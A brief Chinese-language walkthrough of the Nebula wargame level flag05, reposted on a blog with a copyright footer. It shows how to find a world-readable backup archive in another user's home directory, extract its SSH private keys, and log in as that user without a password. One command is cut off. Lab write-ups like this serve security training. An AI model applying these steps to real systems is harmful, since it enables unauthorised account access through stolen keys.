Check the flag05 home directory. You are looking for weak directory permissions
Nebula官网
进去看看
cd /home/flag05/
ll
发现一个其他人可执行的.backup目录
cd .backup/
ll
看到其他人可读的
复制到/tmp解压
/tmp/
cd /tmp/
tar -
看到了备份的公私钥,所以应该可以凭借这些密钥ssh免密码登录flag05账户
cp -r .ssh/ ~/
ssh flag05@localhost
yes
cat flag
本文发布于:2024-02-01 09:04:50,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170674949235519.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |